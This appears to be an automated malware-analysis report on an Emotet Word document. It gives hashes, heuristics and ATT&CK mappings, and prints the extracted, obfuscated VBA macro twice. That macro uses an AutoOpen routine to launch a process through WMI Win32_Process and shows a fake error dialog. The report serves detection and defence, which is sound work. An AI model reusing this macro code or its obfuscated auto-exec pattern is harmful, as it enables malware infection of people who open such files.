Emotet Office (OLE) malware analysis — malicious · dc965c59d5c95961

MALICIOUS

Office (OLE)

195.7 KB Created: 2019-12-03 17:40:00 Authoring application: Microsoft Office Word First seen: 2020-08-10

MD5: be7a781b5a90768ce8fdd9e937b8e933 SHA-1: 93abd5ae9771367d7233aabe289a14bd6232ca26 SHA-256: dc965c59d5c95961f10ce0d40addbbf5d7e601cf6bf242198ae3bebd5d559d2d

282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

This document contains VBA macros, including an AutoOpen macro, that are designed to execute malicious code. The critical heuristic 'OLE_VBA_WMI_PROCESS_CREATE' indicates the use of WMI to launch a process, a common technique for downloading and executing secondary payloads. The ClamAV detection explicitly names this as Emotet, a known downloader family.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-7428131-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7428131-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7909 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7909 bytes
SHA-256: `bca5c5c437b6d7956698bced56982c87a2ece38786c8534a4ab03b778cf74a46`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Mfglgnexo" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "Idgdcnpxc, 0, 0, MSForms, TextBox" Attribute VB_Control = "Ysjqteerugqe, 1, 1, MSForms, TextBox" Attribute VB_Control = "Hxfofvto, 2, 2, MSForms, TextBox" Attribute VB_Control = "Npmkhzuc, 3, 3, MSForms, TextBox" Attribute VB_Control = "Ajoajxyurj, 4, 4, MSForms, TextBox" Attribute VB_Control = "Zkyhduqo, 5, 5, MSForms, TextBox" Attribute VB_Control = "Yjzrbmvogba, 6, 6, MSForms, TextBox" Attribute VB_Control = "Dshidbkil, 7, 7, MSForms, TextBox" Attribute VB_Control = "Jkhojoyxq, 8, 8, MSForms, TextBox" Attribute VB_Control = "Vkahabklhsoj, 9, 9, MSForms, TextBox" Attribute VB_Control = "Ovbjvjknac, 10, 10, MSForms, TextBox" Attribute VB_Control = "Qcqpeixq, 11, 11, MSForms, TextBox" Attribute VB_Name = "Oktiuvyfn" Attribute VB_Base = "0{7675A59C-DCB7-456A-AFC5-678C91677333}{0C5728AD-2192-42B4-A7C8-0BCEADC2CAAF}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Nplxobalb" Function Tmjkyjecuhiw() On Error Resume Next Set Okkopymlha = Jinltwjlwd If Bqzqxgsouoo Or Itnfizag Then Do While nEUFim > CxZxJD6 VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM))) Loop gWAy656o3 = Cos(OMl) ElseIf ZgfHJ Eqv 470086876 Then zpUL19g6 = uDl Kwthifznl = Mzzwoaipqvuo End If CreateObject("winmgmts:Win32_Process").Create Nplxobalb.Ksixgikmdyuq, Gbyhelspxwc, Rlzjypbiogrls Set Hlxtkxrz = Hxcwhaervw If Pythtutpcnf Or Hivhbdzvlug Then Do While nEUFim > CxZxJD6 VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM))) Loop gWAy656o3 = Cos(OMl) ElseIf ZgfHJ Eqv 470086876 Then zpUL19g6 = uDl Twxhfgssw = Ddxfcguszizsj End If Oaxdmnmtkpjym = MsgBox(("Critical Error Encountered"), ("16"), Oktiuvyfn.Mbikshuquzyby) Set Nvikfvbsozqx = Oevoognrhko If Dsoefshqcfic Or Fhmnabyu Then Do While nEUFim > CxZxJD6 VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM))) Loop gWAy656o3 = Cos(OMl) ElseIf ZgfHJ Eqv 470086876 Then zpUL19g6 = uDl Uxcfwnyvkb = Zukekalz End If End Function Sub autoopen() On Error Resume Next Set Aqqokhzgj = Rznnzulogoq If Pwhbxdyymvu Or Nqvumsgmic Then Do While nEUFim > CxZxJD6 VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM))) Loop gWAy656o3 = Cos(OMl) ElseIf ZgfHJ Eqv 470086876 Then zpUL19g6 = uDl Skwizrkibyn = Jftofdskqgusm End If Set Swrbtuoaoy = Pxskkeyt If Czmrdsufyh Or Hdwwtoihxovy Then Do While nEUFim > CxZxJD6 VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM))) Loop gWAy656o3 = Cos(OMl) ElseIf ZgfHJ Eqv 470086876 Then zpUL19g6 = uDl Soehvtai = Ocrwgizwayqo End If Set Epgygpah = Ecuzqkcxjxx If Lsdcwxokvn Or Uzwhjaqu Then Do While nEUFim > CxZxJD6 VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM))) Loop gWAy656o3 = Cos(OMl) ElseIf ZgfHJ Eqv 470086876 Then zpUL19g6 = uDl Xsvnzscpvg = Vfcndjrdj End If Tmjkyjecuhiw End Sub Function Rlzjypbiogrls() On Error Resume Next Set Wirwmlzl = Znxajevzuxdal If Crnbzjanydy Or Zmjfgmwc Then Do While nEUFim > CxZxJD6 VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM))) Loop gWAy656o3 = Cos(OMl) ElseIf ZgfHJ Eqv 470086876 Then zpUL19g6 = uDl Bangrryvw = Jtmkfnzaz End If Jqexsforylof = "winmgmts:Win32_Process" Set Fixmiwkhp = Yvhtxxvmviwkn If Fucmrnxjej Or Fuullxlkdowtz Then Do While nEUFim > CxZxJD6 VLjY49J0 = (8 / 106083443 + (270670809 ... (truncated)

SHA-256: bca5c5c437b6d7956698bced56982c87a2ece38786c8534a4ab03b778cf74a46

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Mfglgnexo"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Idgdcnpxc, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Ysjqteerugqe, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Hxfofvto, 2, 2, MSForms, TextBox"
Attribute VB_Control = "Npmkhzuc, 3, 3, MSForms, TextBox"
Attribute VB_Control = "Ajoajxyurj, 4, 4, MSForms, TextBox"
Attribute VB_Control = "Zkyhduqo, 5, 5, MSForms, TextBox"
Attribute VB_Control = "Yjzrbmvogba, 6, 6, MSForms, TextBox"
Attribute VB_Control = "Dshidbkil, 7, 7, MSForms, TextBox"
Attribute VB_Control = "Jkhojoyxq, 8, 8, MSForms, TextBox"
Attribute VB_Control = "Vkahabklhsoj, 9, 9, MSForms, TextBox"
Attribute VB_Control = "Ovbjvjknac, 10, 10, MSForms, TextBox"
Attribute VB_Control = "Qcqpeixq, 11, 11, MSForms, TextBox"

Attribute VB_Name = "Oktiuvyfn"
Attribute VB_Base = "0{7675A59C-DCB7-456A-AFC5-678C91677333}{0C5728AD-2192-42B4-A7C8-0BCEADC2CAAF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Nplxobalb"
Function Tmjkyjecuhiw()
On Error Resume Next
   Set Okkopymlha = Jinltwjlwd
If Bqzqxgsouoo Or Itnfizag Then
      Do While nEUFim > CxZxJD6
         VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM)))
      Loop
      gWAy656o3 = Cos(OMl)
      ElseIf ZgfHJ Eqv 470086876 Then
      zpUL19g6 = uDl
      Kwthifznl = Mzzwoaipqvuo
End If
CreateObject("winmgmts:Win32_Process").Create Nplxobalb.Ksixgikmdyuq, Gbyhelspxwc, Rlzjypbiogrls
   Set Hlxtkxrz = Hxcwhaervw
If Pythtutpcnf Or Hivhbdzvlug Then
      Do While nEUFim > CxZxJD6
         VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM)))
      Loop
      gWAy656o3 = Cos(OMl)
      ElseIf ZgfHJ Eqv 470086876 Then
      zpUL19g6 = uDl
      Twxhfgssw = Ddxfcguszizsj
End If
Oaxdmnmtkpjym = MsgBox(("Critical Error Encountered"), ("16"), Oktiuvyfn.Mbikshuquzyby)
   Set Nvikfvbsozqx = Oevoognrhko
If Dsoefshqcfic Or Fhmnabyu Then
      Do While nEUFim > CxZxJD6
         VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM)))
      Loop
      gWAy656o3 = Cos(OMl)
      ElseIf ZgfHJ Eqv 470086876 Then
      zpUL19g6 = uDl
      Uxcfwnyvkb = Zukekalz
End If
End Function
Sub autoopen()
On Error Resume Next
   Set Aqqokhzgj = Rznnzulogoq
If Pwhbxdyymvu Or Nqvumsgmic Then
      Do While nEUFim > CxZxJD6
         VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM)))
      Loop
      gWAy656o3 = Cos(OMl)
      ElseIf ZgfHJ Eqv 470086876 Then
      zpUL19g6 = uDl
      Skwizrkibyn = Jftofdskqgusm
End If
   Set Swrbtuoaoy = Pxskkeyt
If Czmrdsufyh Or Hdwwtoihxovy Then
      Do While nEUFim > CxZxJD6
         VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM)))
      Loop
      gWAy656o3 = Cos(OMl)
      ElseIf ZgfHJ Eqv 470086876 Then
      zpUL19g6 = uDl
      Soehvtai = Ocrwgizwayqo
End If
   Set Epgygpah = Ecuzqkcxjxx
If Lsdcwxokvn Or Uzwhjaqu Then
      Do While nEUFim > CxZxJD6
         VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM)))
      Loop
      gWAy656o3 = Cos(OMl)
      ElseIf ZgfHJ Eqv 470086876 Then
      zpUL19g6 = uDl
      Xsvnzscpvg = Vfcndjrdj
End If
Tmjkyjecuhiw
End Sub
Function Rlzjypbiogrls()
On Error Resume Next
   Set Wirwmlzl = Znxajevzuxdal
If Crnbzjanydy Or Zmjfgmwc Then
      Do While nEUFim > CxZxJD6
         VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM)))
      Loop
      gWAy656o3 = Cos(OMl)
      ElseIf ZgfHJ Eqv 470086876 Then
      zpUL19g6 = uDl
      Bangrryvw = Jtmkfnzaz
End If
Jqexsforylof = "winmgmts:Win32_Process"
   Set Fixmiwkhp = Yvhtxxvmviwkn
If Fucmrnxjej Or Fuullxlkdowtz Then
      Do While nEUFim > CxZxJD6
         VLjY49J0 = (8 / 106083443 + (270670809 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.